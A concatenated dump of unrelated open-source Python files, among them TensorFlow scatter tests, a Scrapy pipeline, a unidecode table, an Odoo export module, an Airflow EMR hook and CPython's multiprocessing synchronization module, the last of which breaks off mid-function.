def testRepeatIndicesAdd(self):
self._VariableRankTests(state_ops.scatter_add, True)
def testRepeatIndicesSub(self):
self._VariableRankTests(state_ops.scatter_sub, True)
def testRepeatIndicesMul(self):
self._VariableRankTests(state_ops.scatter_mul, True)
def testRepeatIndicesDiv(self):
self._VariableRankTests(state_ops.scatter_div, True)
def testRepeatIndicesMin(self):
self._VariableRankTests(state_ops.scatter_min, True)
def testRepeatIndicesMax(self):
self._VariableRankTests(state_ops.scatter_max, True)
def testVariableRankUpdateScalar(self):
self._VariableRankTests(state_ops.scatter_update, False, True)
def testVariableRankAddScalar(self):
self._VariableRankTests(state_ops.scatter_add, False, True)
def testVariableRankSubScalar(self):
self._VariableRankTests(state_ops.scatter_sub, False, True)
def testVariableRankMulScalar(self):
self._VariableRankTests(state_ops.scatter_mul, False, True)
def testVariableRankDivScalar(self):
self._VariableRankTests(state_ops.scatter_div, False, True)
def testVariableRankMinScalar(self):
self._VariableRankTests(state_ops.scatter_min, False, True)
def testVariableRankMaxScalar(self):
self._VariableRankTests(state_ops.scatter_max, False, True)
def testRepeatIndicesAddScalar(self):
self._VariableRankTests(state_ops.scatter_add, True, True)
def testRepeatIndicesSubScalar(self):
self._VariableRankTests(state_ops.scatter_sub, True, True)
def testRepeatIndicesMulScalar(self):
self._VariableRankTests(state_ops.scatter_mul, True, True)
def testRepeatIndicesDivScalar(self):
self._VariableRankTests(state_ops.scatter_div, True, True)
def testRepeatIndicesMinScalar(self):
self._VariableRankTests(state_ops.scatter_min, True, True)
def testRepeatIndicesMaxScalar(self):
self._VariableRankTests(state_ops.scatter_max, True, True)
def testBooleanScatterUpdate(self):
if not test.is_gpu_available():
with self.session(use_gpu=False) as session:
var = variables.Variable([True, False])
update0 = state_ops.scatter_update(var, 1, True)
update1 = state_ops.scatter_update(
var, constant_op.constant(
0, dtype=dtypes.int64), False)
var.initializer.run()
session.run([update0, update1])
self.assertAllEqual([False, True], self.evaluate(var))
def testScatterOutOfRangeCpu(self):
for op, _ in _TF_OPS_TO_NUMPY.items():
params = np.array([1, 2, 3, 4, 5, 6]).astype(np.float32)
updates = np.array([-3, -4, -5]).astype(np.float32)
if not test.is_gpu_available():
with self.session(use_gpu=False):
ref = variables.VariableV1(params)
ref.initializer.run()
# Indices all in range, no problem.
indices = np.array([2, 0, 5])
op(ref, indices, updates).eval()
# Test some out of range errors.
indices = np.array([-1, 0, 5])
with self.assertRaisesOpError(
r'indices\[0\] = -1 is not in \[0, 6\)'):
op(ref, indices, updates).eval()
indices = np.array([2, 0, 6])
with self.assertRaisesOpError(r'indices\[2\] = 6 is not in \[0, 6\)'):
op(ref, indices, updates).eval()
# TODO(fpmc): Re-enable this test when gpu_pip test actually runs on a GPU.
def _disabledTestScatterOutOfRangeGpu(self):
if test.is_gpu_available():
return
for op, _ in _TF_OPS_TO_NUMPY.items():
params = np.array([1, 2, 3, 4, 5, 6]).astype(np.float32)
updates = np.array([-3, -4, -5]).astype(np.float32)
# With GPU, the code ignores indices that are out of range.
# We don't test the implementation; just test there's no failures.
with self.cached_session(force_gpu=True):
ref = variables.Variable(params)
ref.initializer.run()
# Indices all in range, no problem.
indices = np.array([2, 0, 5])
op(ref, indices, updates).eval()
# Indicies out of range should not fail.
indices = np.array([-1, 0, 5])
op(ref, indices, updates).eval()
indices = np.array([2, 0, 6])
op(ref, indices, updates).eval()
if __name__ == '__main__':
test.main()
| brchiu/tensorflow | tensorflow/python/kernel_tests/scatter_ops_test.py | Python | apache-2.0 | 11,256 |
import re
import subprocess
import weakref
from scrapy.contrib.pipeline.files import FilesPipeline
from scrapy.exceptions import DropItem
from scrapy.utils.httpobj import urlparse_cached
from twisted.internet import threads
class SlideDefaults(object):
"""Set up defaults items."""
def process_item(self, item, spider):
if not item.get('id'):
raise DropItem("item id is missing")
item['spider'] = spider.name
return item
class SlideImages(FilesPipeline):
"""Downloads slide images."""
DEFAULT_FILES_URLS_FIELD = 'image_urls'
DEFAULT_FILES_RESULT_FIELD = 'images'
def get_media_requests(self, item, info):
reqs = super(SlideImages, self).get_media_requests(item, info)
self._load_keys(reqs, item)
return reqs
def _load_keys(self, requests, item):
# Preload file paths into the requests because we use the item data to
# generate the path.
for req in requests:
pr = urlparse_cached(req)
# filename is last part of the URL path.
image = pr.path.rpartition('/')[-1]
req.meta['file_path'] = '/{spider}/{slide_id}/{image}'.format(
spider=item['spider'],
slide_id=item['id'],
image=image,
)
def file_path(self, request, response=None, info=None):
return request.meta['file_path']
class SlidePDF(object):
"""Converts slides images to PDF."""
def process_item(self, item, spider):
if not item.get('images'):
raise DropItem("no images found")
return threads.deferToThread(self._convert, item, spider)
def _convert(self, item, spider):
image_paths = [im['path'] for im in item['images']]
datapath = spider.crawler.settings['FILES_STORE']
image_files = [datapath + path for path in image_paths]
item['pdf_file'] = '%s.pdf' % item['id']
dest = '{root}/{spider}/{file}'.format(
root=datapath,
spider=item['spider'],
file=item['pdf_file'],
)
# Use convert command from ImageMagick.
cmd = ['convert'] + image_files + [dest]
try:
# TODO: capture errors
subprocess.check_call(cmd, stdout=subprocess.PIPE)
except subprocess.CalledProcessError:
raise DropItem("failed to generate PDF")
return item
| rolando/scrapy-slidebot | slidebot/pipelines.py | Python | mit | 2,428 |
data = (
'Hai ', # 0x00
'Ren ', # 0x01
'Tian ', # 0x02
'Jiao ', # 0x03
'Jia ', # 0x04
'Bing ', # 0x05
'Yao ', # 0x06
'Tong ', # 0x07
'Ci ', # 0x08
'Xiang ', # 0x09
'Yang ', # 0x0a
'Yang ', # 0x0b
'Er ', # 0x0c
'Yan ', # 0x0d
'Le ', # 0x0e
'Yi ', # 0x0f
'Can ', # 0x10
'Bo ', # 0x11
'Nei ', # 0x12
'E ', # 0x13
'Bu ', # 0x14
'Jun ', # 0x15
'Dou ', # 0x16
'Su ', # 0x17
'Yu ', # 0x18
'Shi ', # 0x19
'Yao ', # 0x1a
'Hun ', # 0x1b
'Guo ', # 0x1c
'Shi ', # 0x1d
'Jian ', # 0x1e
'Zhui ', # 0x1f
'Bing ', # 0x20
'Xian ', # 0x21
'Bu ', # 0x22
'Ye ', # 0x23
'Tan ', # 0x24
'Fei ', # 0x25
'Zhang ', # 0x26
'Wei ', # 0x27
'Guan ', # 0x28
'E ', # 0x29
'Nuan ', # 0x2a
'Hun ', # 0x2b
'Hu ', # 0x2c
'Huang ', # 0x2d
'Tie ', # 0x2e
'Hui ', # 0x2f
'Jian ', # 0x30
'Hou ', # 0x31
'He ', # 0x32
'Xing ', # 0x33
'Fen ', # 0x34
'Wei ', # 0x35
'Gu ', # 0x36
'Cha ', # 0x37
'Song ', # 0x38
'Tang ', # 0x39
'Bo ', # 0x3a
'Gao ', # 0x3b
'Xi ', # 0x3c
'Kui ', # 0x3d
'Liu ', # 0x3e
'Sou ', # 0x3f
'Tao ', # 0x40
'Ye ', # 0x41
'Yun ', # 0x42
'Mo ', # 0x43
'Tang ', # 0x44
'Man ', # 0x45
'Bi ', # 0x46
'Yu ', # 0x47
'Xiu ', # 0x48
'Jin ', # 0x49
'San ', # 0x4a
'Kui ', # 0x4b
'Zhuan ', # 0x4c
'Shan ', # 0x4d
'Chi ', # 0x4e
'Dan ', # 0x4f
'Yi ', # 0x50
'Ji ', # 0x51
'Rao ', # 0x52
'Cheng ', # 0x53
'Yong ', # 0x54
'Tao ', # 0x55
'Hui ', # 0x56
'Xiang ', # 0x57
'Zhan ', # 0x58
'Fen ', # 0x59
'Hai ', # 0x5a
'Meng ', # 0x5b
'Yan ', # 0x5c
'Mo ', # 0x5d
'Chan ', # 0x5e
'Xiang ', # 0x5f
'Luo ', # 0x60
'Zuan ', # 0x61
'Nang ', # 0x62
'Shi ', # 0x63
'Ding ', # 0x64
'Ji ', # 0x65
'Tuo ', # 0x66
'Xing ', # 0x67
'Tun ', # 0x68
'Xi ', # 0x69
'Ren ', # 0x6a
'Yu ', # 0x6b
'Chi ', # 0x6c
'Fan ', # 0x6d
'Yin ', # 0x6e
'Jian ', # 0x6f
'Shi ', # 0x70
'Bao ', # 0x71
'Si ', # 0x72
'Duo ', # 0x73
'Yi ', # 0x74
'Er ', # 0x75
'Rao ', # 0x76
'Xiang ', # 0x77
'Jia ', # 0x78
'Le ', # 0x79
'Jiao ', # 0x7a
'Yi ', # 0x7b
'Bing ', # 0x7c
'Bo ', # 0x7d
'Dou ', # 0x7e
'E ', # 0x7f
'Yu ', # 0x80
'Nei ', # 0x81
'Jun ', # 0x82
'Guo ', # 0x83
'Hun ', # 0x84
'Xian ', # 0x85
'Guan ', # 0x86
'Cha ', # 0x87
'Kui ', # 0x88
'Gu ', # 0x89
'Sou ', # 0x8a
'Chan ', # 0x8b
'Ye ', # 0x8c
'Mo ', # 0x8d
'Bo ', # 0x8e
'Liu ', # 0x8f
'Xiu ', # 0x90
'Jin ', # 0x91
'Man ', # 0x92
'San ', # 0x93
'Zhuan ', # 0x94
'Nang ', # 0x95
'Shou ', # 0x96
'Kui ', # 0x97
'Guo ', # 0x98
'Xiang ', # 0x99
'Fen ', # 0x9a
'Ba ', # 0x9b
'Ni ', # 0x9c
'Bi ', # 0x9d
'Bo ', # 0x9e
'Tu ', # 0x9f
'Han ', # 0xa0
'Fei ', # 0xa1
'Jian ', # 0xa2
'An ', # 0xa3
'Ai ', # 0xa4
'Fu ', # 0xa5
'Xian ', # 0xa6
'Wen ', # 0xa7
'Xin ', # 0xa8
'Fen ', # 0xa9
'Bin ', # 0xaa
'Xing ', # 0xab
'Ma ', # 0xac
'Yu ', # 0xad
'Feng ', # 0xae
'Han ', # 0xaf
'Di ', # 0xb0
'Tuo ', # 0xb1
'Tuo ', # 0xb2
'Chi ', # 0xb3
'Xun ', # 0xb4
'Zhu ', # 0xb5
'Zhi ', # 0xb6
'Pei ', # 0xb7
'Xin ', # 0xb8
'Ri ', # 0xb9
'Sa ', # 0xba
'Yin ', # 0xbb
'Wen ', # 0xbc
'Zhi ', # 0xbd
'Dan ', # 0xbe
'Lu ', # 0xbf
'You ', # 0xc0
'Bo ', # 0xc1
'Bao ', # 0xc2
'Kuai ', # 0xc3
'Tuo ', # 0xc4
'Yi ', # 0xc5
'Qu ', # 0xc6
None, # 0xc7
'Qu ', # 0xc8
'Jiong ', # 0xc9
'Bo ', # 0xca
'Zhao ', # 0xcb
'Yuan ', # 0xcc
'Peng ', # 0xcd
'Zhou ', # 0xce
'Ju ', # 0xcf
'Zhu ', # 0xd0
'Nu ', # 0xd1
'Ju ', # 0xd2
'Pi ', # 0xd3
'Zang ', # 0xd4
'Jia ', # 0xd5
'Ling ', # 0xd6
'Zhen ', # 0xd7
'Tai ', # 0xd8
'Fu ', # 0xd9
'Yang ', # 0xda
'Shi ', # 0xdb
'Bi ', # 0xdc
'Tuo ', # 0xdd
'Tuo ', # 0xde
'Si ', # 0xdf
'Liu ', # 0xe0
'Ma ', # 0xe1
'Pian ', # 0xe2
'Tao ', # 0xe3
'Zhi ', # 0xe4
'Rong ', # 0xe5
'Teng ', # 0xe6
'Dong ', # 0xe7
'Xun ', # 0xe8
'Quan ', # 0xe9
'Shen ', # 0xea
'Jiong ', # 0xeb
'Er ', # 0xec
'Hai ', # 0xed
'Bo ', # 0xee
'Zhu ', # 0xef
'Yin ', # 0xf0
'Luo ', # 0xf1
'Shuu ', # 0xf2
'Dan ', # 0xf3
'Xie ', # 0xf4
'Liu ', # 0xf5
'Ju ', # 0xf6
'Song ', # 0xf7
'Qin ', # 0xf8
'Mang ', # 0xf9
'Liang ', # 0xfa
'Han ', # 0xfb
'Tu ', # 0xfc
'Xuan ', # 0xfd
'Tui ', # 0xfe
'Jun ', # 0xff
)
| avian2/unidecode | unidecode/x099.py | Python | gpl-2.0 | 4,627 |
#!/home/paulk/software/bin/python
from __future__ import division
import sys,os,time,gzip
import cPickle,pysam,random,math
import pylab
from multiprocessing import Process,Queue
import numpy
"""
Synopsis
Given a GTF file of genes, txs and exons prints to stdout the union of genes'
exons over all txs.
"""
def usage():
print >> sys.stderr,"""Script to determine the union of exons over txs
Usage: ./gene2exons.py <GTF> <exon_file>
Results are printed to std out.
Output (tab-delimited): gene_id,chrom,exon_no,start,end"""
class Interval:
def __init__(self,st,sp):
self.l = st
self.r = sp
def union(self,I):
if self.l <= I.r: L = self.l
else: L = I.l
if self.r >= I.r: R = self.r
else: R = I.r
return Interval(L,R)
try:
gtf_file = sys.argv[1]
except IndexError:
print >> sys.stderr,"Error: Enter GTF file"
usage()
sys.exit(1)
try:
exonsfile = sys.argv[2]
except IndexError:
print >> sys.stderr,"Error: Enter exons file"
usage()
sys.exit(1)
# tx2gene
gene2tx = dict()
f = open(gtf_file,'r')
for l in f:
line = l.strip().split('\t')
_data = line[8].split(';')
data = [each.strip() for each in _data]
tx = data[1][15:-1]
gene = data[0][9:-1]
if gene not in gene2tx:
gene2tx[gene] = [tx]
else:
gene2tx[gene] += [tx]
f.close()
print >> sys.stderr,"[%s] Read GTF." % (time.ctime(time.time()))
# tx2exons
tx2exons = dict()
f = open(exonsfile,'r')
for line in f:
l = line.strip().split('\t')
tx_id = l[0]
st = int(l[3])
sp = int(l[4])
no = int(l[1])
chrom = l[2]
if tx_id not in tx2exons:
tx2exons[tx_id] = dict()
else:
pass
tx2exons[tx_id][no] = Interval(st,sp)
tx2exons[tx_id]['chrom'] = chrom
f.close()
print >> sys.stderr,"[%s] Read exons." % (time.ctime(time.time()))
# genes2exons
gene2exons = dict()
for gene in gene2tx:
for tx in gene2tx[gene]:
if not tx2exons.has_key(tx): continue
for no in tx2exons[tx]:
if gene not in gene2exons:
gene2exons[gene] = dict()
gene2exons[gene]['chrom'] = tx2exons[tx]['chrom']
else:
pass
if no not in gene2exons[gene] and no != 'chrom':
gene2exons[gene][no] = tx2exons[tx][no]
elif no in gene2exons[gene] and no != 'chrom':
gene2exons[gene][no] = gene2exons[gene][no].union(tx2exons[tx][no])
print >> sys.stderr,"[%s] Built gene->exons." % (time.ctime(time.time()))
for gene in gene2exons:
for no in gene2exons[gene]:
if no == 'chrom': continue
print "%s\t%s\t%s\t%s\t%s" % (gene,gene2exons[gene]['chrom'],no,gene2exons[gene][no].l,gene2exons[gene][no].r)
| polarise/RP-python | gene2exons.py | Python | gpl-2.0 | 2,496 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class DayDetails(Model):
"""Properties of a daily schedule.
:param time: The time of day the schedule will occur.
:type time: str
"""
_attribute_map = {
'time': {'key': 'time', 'type': 'str'},
}
def __init__(self, time=None):
self.time = time
| v-iam/azure-sdk-for-python | azure-mgmt-devtestlabs/azure/mgmt/devtestlabs/models/day_details.py | Python | mit | 805 |
# coding:utf-8
'''
Created on 2017/11/22.
@author: chk01
'''
import argparse
import os
import matplotlib.pyplot as plt
from matplotlib.pyplot import imshow
import scipy.io
import scipy.misc
import numpy as np
import pandas as pd
import PIL
import tensorflow as tf
from keras import backend as K
from keras.layers import Input, Lambda, Conv2D
from keras.models import load_model, Model
from class_four.week_three.yolo_utils import read_classes, read_anchors, generate_colors, preprocess_image, draw_boxes, \
scale_boxes
from class_four.week_three.yad2k.models.keras_yolo import yolo_head, yolo_boxes_to_corners, preprocess_true_boxes, \
yolo_loss, yolo_body
def yolo_filter_boxes(box_confidence, boxes, box_class_probs, threshold=.6):
"""Filters YOLO boxes by thresholding on object and class confidence.
Arguments:
box_confidence -- tensor of shape (19, 19, 5, 1)
boxes -- tensor of shape (19, 19, 5, 4)
box_class_probs -- tensor of shape (19, 19, 5, 80)
threshold -- real value, if [ highest class probability score < threshold], then get rid of the corresponding box
Returns:
scores -- tensor of shape (None,), containing the class probability score for selected boxes
boxes -- tensor of shape (None, 4), containing (b_x, b_y, b_h, b_w) coordinates of selected boxes
classes -- tensor of shape (None,), containing the index of the class detected by the selected boxes
Note: "None" is here because you don't know the exact number of selected boxes, as it depends on the threshold.
For example, the actual output size of scores would be (10,) if there are 10 boxes.
"""
# Step 1: Compute box scores
### START CODE HERE ### (≈ 1 line)
box_scores = box_confidence * box_class_probs
print(box_scores.shape)
### END CODE HERE ###
# Step 2: Find the box_classes thanks to the max box_scores, keep track of the corresponding score
### START CODE HERE ### (≈ 2 lines)
box_classes = K.argmax(box_scores, axis=-1)
print(box_classes.shape)
print(box_classes)
box_class_scores = K.max(box_classes,axis=-1)
print(box_class_scores.shape)
### END CODE HERE ###
# Step 3: Create a filtering mask based on "box_class_scores" by using "threshold". The mask should have the
# same dimension as box_class_scores, and be True for the boxes you want to keep (with probability >= threshold)
### START CODE HERE ### (≈ 1 line)
filtering_mask = box_class_scores < threshold
### END CODE HERE ###
# Step 4: Apply the mask to scores, boxes and classes
### START CODE HERE ### (≈ 3 lines)
scores = None
boxes = None
classes = None
### END CODE HERE ###
return scores, boxes, classes
with tf.Session() as test_a:
box_confidence = tf.random_normal([19, 19, 5, 1], mean=1, stddev=4, seed=1)
boxes = tf.random_normal([19, 19, 5, 4], mean=1, stddev=4, seed=1)
box_class_probs = tf.random_normal([19, 19, 5, 80], mean=1, stddev=4, seed=1)
scores, boxes, classes = yolo_filter_boxes(box_confidence, boxes, box_class_probs, threshold=0.5)
print("scores[2] = " + str(scores[2].eval()))
print("boxes[2] = " + str(boxes[2].eval()))
print("classes[2] = " + str(classes[2].eval()))
print("scores.shape = " + str(scores.shape))
print("boxes.shape = " + str(boxes.shape))
print("classes.shape = " + str(classes.shape))
| sunyihuan326/DeltaLab | Andrew_NG_learning/class_four/week_three/Dxq_1.py | Python | mit | 3,398 |
from cProfile import run
from reg import dispatch
from reg import LruCachingKeyLookup
def get_key_lookup(r):
return LruCachingKeyLookup(
r,
component_cache_size=5000,
all_cache_size=5000,
fallback_cache_size=5000,
)
@dispatch(get_key_lookup=get_key_lookup)
def args0():
raise NotImplementedError()
@dispatch("a", get_key_lookup=get_key_lookup)
def args1(a):
raise NotImplementedError()
@dispatch("a", "b", get_key_lookup=get_key_lookup)
def args2(a, b):
raise NotImplementedError()
@dispatch("a", "b", "c", get_key_lookup=get_key_lookup)
def args3(a, b, c):
raise NotImplementedError()
@dispatch("a", "b", "c", "d", get_key_lookup=get_key_lookup)
def args4(a, b, c, d):
raise NotImplementedError()
class Foo:
pass
def myargs0():
return "args0"
def myargs1(a):
return "args1"
def myargs2(a, b):
return "args2"
def myargs3(a, b, c):
return "args3"
def myargs4(a, b, c, d):
return "args4"
args0.register(myargs0)
args1.register(myargs1, a=Foo)
args2.register(myargs2, a=Foo, b=Foo)
args3.register(myargs3, a=Foo, b=Foo, c=Foo)
args4.register(myargs4, a=Foo, b=Foo, c=Foo, d=Foo)
def repeat_args4():
for i in range(10000):
args4(Foo(), Foo(), Foo(), Foo())
run("repeat_args4()", sort="tottime")
| morepath/reg | profdispatch.py | Python | bsd-3-clause | 1,317 |
# -*- coding: utf-8 -*-
##############################################################################
# For copyright and license notices, see __openerp__.py file in module root
# directory
##############################################################################
from openerp import models, fields, api
import base64
from afip_cesp import escribir, LIQUIDACION_SP
import datetime
class infocoop_tab_fact(models.Model):
_inherit = "infocoop_tab_fact"
cesp_data = fields.Binary(string='Cesp')
cesp_filename = fields.Char()
@api.one
def generate_cesp(self):
cesp_data = ""
m1 = int(self.periodo[:2])
y = int(self.periodo[-4:])
p1 = self.periodo
p2 = str(m1 + 1) + str(y)
if m1 % 2 == 1: # only even
liqs = self.env["infocoop_liquidac"].search(
[("periodo", "in", (p1, p2)), ])
for l in liqs:
socio_id = self.env["infocoop_socios"].search(
[("medido", "=", l.medidor), ("orden", "=", l.orden)],
limit=1)
sm_ids = self.env["infocoop.socios_member"].search(
[("master_id", "=", socio_id.id), ], limit=1)
if sm_ids:
partner_id = sm_ids.slave_id
else:
ingreso_id = self.env["infocoop_ingresos"].search(
[("medidor", "=", l.medidor), ("orden", "=", l.orden)],
limit=1)
im_ids = self.env["infocoop.ingresos_member"].search(
[("master_id", "=", ingreso_id.id), ], limit=1)
partner_id = im_ids.slave_id
print partner_id.name
print partner_id.main_id_number
vals = dict()
vals['cbte_tipo'] = 18 # Liquidacion B
vals['cbt_numero'] = l.numero
vals['cbte_nro_interno'] = l.num_fact
if l.servicios == "/A":
vals['tipo_servicio'] = "A"
vals['pto_vta'] = 3
elif l.servicios == "/E":
vals['tipo_servicio'] = "E"
vals['pto_vta'] = 1
else:
continue
vals['fecha_cbte'] = datetime.date(
year=y, month=m1, day=1)
# Usuario y tutular
vals['usuario_tiene_info'] = 'S'
vals['titular_tiene_info'] = 'S'
vals['usuario_id'] = l.medidor + l.orden
vals['usuario_nombre'] = socio_id.nombre
vals['titular_nombre'] = socio_id.nombre
if partner_id:
if partner_id.main_id_number\
and partner_id.main_id_category_id:
tipo_doc = \
partner_id.main_id_category_id.afip_code
if tipo_doc:
vals['usuario_tipo_doc'] = tipo_doc
vals['usuario_nro_doc'] = partner_id.main_id_number
vals['titular_tipo_doc'] = tipo_doc
vals['titular_nro_doc'] = partner_id.main_id_number
if partner_id.afip_responsability_type_id:
vals['usuario_impositiva_id'] = \
partner_id.afip_responsability_type_id.code
# vals['titular_inmueble_tiene_info'] = 'N'
# vals['usuario_domicilio_tiene_info'] = 'S'
# vals['usuario_domicilio_calle']= l.prestacion.cliente.domicilio_particular.direccion
# vals['usuario_domicilio_puerta']=l.prestacion.cliente.domicilio_particular.altura
# # vals=['usuario_domicilio_piso']=,
# # vals=['usuario_domicilio_oficina']=,
# vals['usuario_domicilio_cp']=prestacion.cliente.domicilio_particular.codigo_postal
# vals['usuario_domicilio_localidad']=prestacion.cliente.domicilio_particular.localidad.nombre
# # vals=['usuario_domicilio_partido']=
# vals['usuario_domicilio_provincia']=prestacion.cliente.domicilio_particular.provincia.codigo_afi
cesp_data += escribir(vals, LIQUIDACION_SP)
return self.write({
'cesp_filename': 'cesp.txt',
'cesp_data': base64.encodestring(cesp_data)
})
| barct/odoo-coop | infocoop_afip_patch/models/infocoop_tab_fact.py | Python | gpl-3.0 | 4,487 |
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from airflow.exceptions import AirflowException
from airflow.contrib.hooks.aws_hook import AwsHook
class EmrHook(AwsHook):
"""
Interact with AWS EMR. emr_conn_id is only necessary for using the
create_job_flow method.
"""
def __init__(self, emr_conn_id=None, *args, **kwargs):
self.emr_conn_id = emr_conn_id
super(EmrHook, self).__init__(*args, **kwargs)
def get_conn(self):
self.conn = self.get_client_type('emr')
return self.conn
def create_job_flow(self, job_flow_overrides):
"""
Creates a job flow using the config from the EMR connection.
Keys of the json extra hash may have the arguments of the boto3
run_job_flow method.
Overrides for this config may be passed as the job_flow_overrides.
"""
if not self.emr_conn_id:
raise AirflowException('emr_conn_id must be present to use create_job_flow')
emr_conn = self.get_connection(self.emr_conn_id)
config = emr_conn.extra_dejson.copy()
config.update(job_flow_overrides)
response = self.get_conn().run_job_flow(**config)
return response
| jgao54/airflow | airflow/contrib/hooks/emr_hook.py | Python | apache-2.0 | 1,979 |
#
# Module implementing synchronization primitives
#
# multiprocessing/synchronize.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
__all__ = [
'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore', 'Condition', 'Event'
]
import threading
import sys
import tempfile
import _multiprocessing
from time import time as _time
from . import context
from . import process
from . import util
# Try to import the mp.synchronize module cleanly, if it fails
# raise ImportError for platforms lacking a working sem_open implementation.
# See issue 3770
try:
from _multiprocessing import SemLock, sem_unlink
except (ImportError):
raise ImportError("This platform lacks a functioning sem_open" +
" implementation, therefore, the required" +
" synchronization primitives needed will not" +
" function, see issue 3770.")
#
# Constants
#
RECURSIVE_MUTEX, SEMAPHORE = list(range(2))
SEM_VALUE_MAX = _multiprocessing.SemLock.SEM_VALUE_MAX
#
# Base class for semaphores and mutexes; wraps `_multiprocessing.SemLock`
#
class SemLock(object):
_rand = tempfile._RandomNameSequence()
def __init__(self, kind, value, maxvalue, *, ctx):
if ctx is None:
ctx = context._default_context.get_context()
name = ctx.get_start_method()
unlink_now = sys.platform == 'win32' or name == 'fork'
for i in range(100):
try:
sl = self._semlock = _multiprocessing.SemLock(
kind, value, maxvalue, self._make_name(),
unlink_now)
except FileExistsError:
pass
else:
break
else:
raise FileExistsError('cannot find name for semaphore')
util.debug('created semlock with handle %s' % sl.handle)
self._make_methods()
if sys.platform != 'win32':
def _after_fork(obj):
obj._semlock._after_fork()
util.register_after_fork(self, _after_fork)
if self._semlock.name is not None:
# We only get here if we are on Unix with forking
# disabled. When the object is garbage collected or the
# process shuts down we unlink the semaphore name
from .semaphore_tracker import register
register(self._semlock.name)
util.Finalize(self, SemLock._cleanup, (self._semlock.name,),
exitpriority=0)
@staticmethod
def _cleanup(name):
from .semaphore_tracker import unregister
sem_unlink(name)
unregister(name)
def _make_methods(self):
self.acquire = self._semlock.acquire
self.release = self._semlock.release
def __enter__(self):
return self._semlock.__enter__()
def __exit__(self, *args):
return self._semlock.__exit__(*args)
def __getstate__(self):
context.assert_spawning(self)
sl = self._semlock
if sys.platform == 'win32':
h = context.get_spawning_popen().duplicate_for_child(sl.handle)
else:
h = sl.handle
return (h, sl.kind, sl.maxvalue, sl.name)
def __setstate__(self, state):
self._semlock = _multiprocessing.SemLock._rebuild(*state)
util.debug('recreated blocker with handle %r' % state[0])
self._make_methods()
@staticmethod
def _make_name():
return '%s-%s' % (process.current_process()._config['semprefix'],
next(SemLock._rand))
#
# Semaphore
#
class Semaphore(SemLock):
def __init__(self, value=1, *, ctx):
SemLock.__init__(self, SEMAPHORE, value, SEM_VALUE_MAX, ctx=ctx)
def get_value(self):
return self._semlock._get_value()
def __repr__(self):
try:
value = self._semlock._get_value()
except Exception:
value = 'unknown'
return '<%s(value=%s)>' % (self.__class__.__name__, value)
#
# Bounded semaphore
#
class BoundedSemaphore(Semaphore):
def __init__(self, value=1, *, ctx):
SemLock.__init__(self, SEMAPHORE, value, value, ctx=ctx)
def __repr__(self):
try:
value = self._semlock._get_value()
except Exception:
value = 'unknown'
return '<%s(value=%s, maxvalue=%s)>' % \
(self.__class__.__name__, value, self._semlock.maxvalue)
#
# Non-recursive lock
#
class Lock(SemLock):
def __init__(self, *, ctx):
SemLock.__init__(self, SEMAPHORE, 1, 1, ctx=ctx)
def __repr__(self):
try:
if self._semlock._is_mine():
name = process.current_process().name
if threading.current_thread().name != 'MainThread':
name += '|' + threading.current_thread().name
elif self._semlock._get_value() == 1:
name = 'None'
elif self._semlock._count() > 0:
name = 'SomeOtherThread'
else:
name = 'SomeOtherProcess'
except Exception:
name = 'unknown'
return '<%s(owner=%s)>' % (self.__class__.__name__, name)
#
# Recursive lock
#
class RLock(SemLock):
def __init__(self, *, ctx):
SemLock.__init__(self, RECURSIVE_MUTEX, 1, 1, ctx=ctx)
def __repr__(self):
try:
if self._semlock._is_mine():
name = process.current_process().name
if threading.current_thread().name != 'MainThread':
name += '|' + threading.current_thread().name
count = self._semlock._count()
elif self._semlock._get_value() == 1:
name, count = 'None', 0
elif self._semlock._count() > 0:
name, count = 'SomeOtherThread', 'nonzero'
else:
name, count = 'SomeOtherProcess', 'nonzero'
except Exception:
name, count = 'unknown', 'unknown'
return '<%s(%s, %s)>' % (self.__class__.__name__, name, count)
#
# Condition variable
#
class Condition(object):
def __init__(self, lock=None, *, ctx):
self._lock = lock or ctx.RLock()
self._sleeping_count = ctx.Semaphore(0)
self._woken_count = ctx.Semaphore(0)
self._wait_semaphore = ctx.Semaphore(0)
self._make_methods()
def __getstate__(self):
context.assert_spawning(self)
return (self._lock, self._sleeping_count,
self._woken_count, self._wait_semaphore)
def __setstate__(self, state):
(self._lock, self._sleeping_count,
self._woken_count, self._wait_semaphore) = state
self._make_methods()
def __enter__(self):
return self._lock.__enter__()
def __exit__(self, *args):
return self._lock.__exit__(*args)
def _make_methods(self):
self.acquire = self._lock.acquire
self.release = self._lock.release
def __repr__(self):
try:
num_waiters = (self._sleeping_count._semlock._get_value() -
self._woken_count._semlock._get_value())
except Exception:
num_waiters = 'unknown'
return '<%s(%s, %s)>' % (self.__class__.__name__, self._lock, num_waiters)
def wait(self, timeout=None):
assert self._lock._semlock._is_mine(), \
'must acquire() condition before using wait()'
# indicate that this thread is going to sleep
self._sleeping_count.release()
# release lock
count = self._lock._semlock._count()
for i in range(count):
self._lock.release()
try:
# wait for notification or timeout
return self._wait_semaphore.acquire(True, timeout)
finally:
# indicate that this thread has woken
self._woken_count.release()
# reacquire lock
for i in range(count):
self._lock.acquire()
def notify(self, n=1):
assert self._lock._semlock._is_mine(), 'lock is not owned'
assert not self._wait_semaphore.acquire(
False), ('notify: Should not have been able to acquire'
+ '_wait_semaphore')
# to take account of timeouts since last notify*() we subtract
# woken_count from sleeping_count and rezero woken_count
while self._woken_count.acquire(False):
res = self._sleeping_count.acquire(False)
assert res, ('notify: Bug in sleeping_count.acquire'
+ '- res should not be False')
sleepers = 0
while sleepers < n and self._sleeping_count.acquire(False):
self._wait_semaphore.release() # wake up one sleeper
sleepers += 1
if sleepers:
